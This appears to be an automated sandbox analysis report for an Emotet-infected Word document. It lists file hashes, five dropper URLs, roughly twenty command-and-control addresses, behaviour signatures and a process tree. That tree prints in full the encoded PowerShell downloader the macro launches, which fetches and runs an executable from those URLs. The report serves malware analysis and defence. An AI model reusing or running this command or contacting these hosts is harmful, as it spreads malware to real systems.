Analysis

  • max time kernel
    112s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    31-07-2020 23:13

General

  • Target

    messaggio_072020.doc

  • Size

    168KB

  • MD5

    a08ddcb5b46a9a12271bb2eb465965f7

  • SHA1

    5a30279de2f80ccd0ccc2d29fb06b35fae9c697a

  • SHA256

    72038c4d742717c91add32782d8128e5c7753b4cd7ef566bcc1d39aa0df0677e

  • SHA512

    8d19d653d4f750a8b9bf565235e21395df4b3166c6143a9b2a9c16ab5e510efe86b5bb38c07f56cf94eca9ec3104e682c0bb69a1ca2462acd84b6ab777c9662b

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://mc-interiorismo.com/theme/Rk/

exe.dropper

http://mc130.com/SHB/KloCHjT/

exe.dropper

http://mentarimedia.com/modules/p6N365/

exe.dropper

http://mellysphotography.com/large/Rem220541/

exe.dropper

http://vipmein.com/assets2/6eeP7BwazY/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Executes dropped EXE 2 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\messaggio_072020.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1164
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABPAFYASQBGAFQAagBjAGQAPQAnAFgAUgBBAEMAUQBiAG8AawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAcgBgAGkAVABgAFkAUAByAGAAbwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAFUAWgBHAFAAVQBjAG0AaQAgAD0AIAAnADYANAAxACcAOwAkAE4AUwBHAFMATABwAHoAZAA9ACcAQwBWAFAASwBXAHQAcwBoACcAOwAkAE4ARwBSAEQAUQBwAHQAcgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQBaAEcAUABVAGMAbQBpACsAJwAuAGUAeABlACcAOwAkAEkATQBIAEIATgBrAHcAegA9ACcAUwBKAEUAQQBKAG0AegB2ACcAOwAkAFAARgBUAFgARgBpAHkAdwA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgBXAGUAYgBDAEwAaQBlAG4AdAA7ACQAUQBKAFYATABEAG0AdQBkAD0AJwBoAHQAdABwADoALwAvAG0AYwAtAGkAbgB0AGUAcgBpAG8AcgBpAHMAbQBvAC4AYwBvAG0ALwB0AGgAZQBtAGUALwBSAGsALwAqAGgAdAB0AHAAOgAvAC8AbQBjADEAMwAwAC4AYwBvAG0ALwBTAEgAQgAvAEsAbABvAEMASABqAFQALwAqAGgAdAB0AHAAOgAvAC8AbQBlAG4AdABhAHIAaQBtAGUAZABpAGEALgBjAG8AbQAvAG0AbwBkAHUAbABlAHMALwBwADYATgAzADYANQAvACoAaAB0AHQAcAA6AC8ALwBtAGUAbABsAHkAcwBwAGgAbwB0AG8AZwByAGEAcABoAHkALgBjAG8AbQAvAGwAYQByAGcAZQAvAFIAZQBtADIAMgAwADUANAAxAC8AKgBoAHQAdABwADoALwAvAHYAaQBwAG0AZQBpAG4ALgBjAG8AbQAvAGEAcwBzAGUAdABzADIALwA2AGUAZQBQADcAQgB3AGEAegBZAC8AJwAuACIAUwBwAGAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJAEQAWABQAFQAZwBoAGEAPQAnAEgARwBFAEkAWQB1AGUAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBQAFMAWABFAHIAZwBkACAAaQBuACAAJABRAEoAVgBMAEQAbQB1AGQAKQB7AHQAcgB5AHsAJABQAEYAVABYAEYAaQB5AHcALgAiAGQAbwB3AE4AbABvAEEAYABkAGYASQBgAEwAZQAiACgAJABTAFAAUwBYAEUAcgBnAGQALAAgACQATgBHAFIARABRAHAAdAByACkAOwAkAEYATQBGAFYAVgBsAHQAaAA9ACcAUABDAEwARABMAGEAbwBrACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQATgBHAFIARABRAHAAdAByACkALgAiAGwAYABFAE4ARwB0AEgAIgAgAC0AZwBlACAAMgAyADcANAA1ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBgAEUAQQBUAEUAIgAoACQATgBHAFIARABRAHAAdAByACkAOwAkAFMAUwBCAFQATQBhAG8AdAA9ACcASgBMAEoAVwBHAGgAdABqACcAOwBiAHIAZQBhAGsAOwAkAE0ASABMAFcATQBsAHIAeQA9ACcARABWAEQAVQBOAHEAcQBrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAUwBUAFUASABzAGIAeAA9ACcARwBGAEYAVgBTAHIAbwB4ACcA
    1⤵
    • Process spawned unexpected child process
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    PID:536
  • C:\Users\Admin\641.exe
    C:\Users\Admin\641.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Windows\SysWOW64\OpcServices\hcproviders.exe
      "C:\Windows\SysWOW64\OpcServices\hcproviders.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1760

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\641.exe
  • C:\Users\Admin\641.exe
  • C:\Windows\SysWOW64\OpcServices\hcproviders.exe
  • memory/1164-5-0x000000000AA30000-0x000000000AA34000-memory.dmp
    Filesize

    16KB

  • memory/1164-6-0x000000000BAB0000-0x000000000BAB4000-memory.dmp
    Filesize

    16KB

  • memory/1164-7-0x0000000006E00000-0x0000000007000000-memory.dmp
    Filesize

    2.0MB

  • memory/1164-8-0x0000000006E00000-0x0000000007000000-memory.dmp
    Filesize

    2.0MB

  • memory/1164-2-0x00000000088C0000-0x00000000088C4000-memory.dmp
    Filesize

    16KB

  • memory/1164-4-0x0000000006E00000-0x0000000007000000-memory.dmp
    Filesize

    2.0MB

  • memory/1164-3-0x0000000006E00000-0x0000000007000000-memory.dmp
    Filesize

    2.0MB

  • memory/1264-10-0x00000000003E0000-0x00000000003EC000-memory.dmp
    Filesize

    48KB

  • memory/1760-12-0x0000000000000000-mapping.dmp
  • memory/1760-14-0x0000000000310000-0x000000000031C000-memory.dmp
    Filesize

    48KB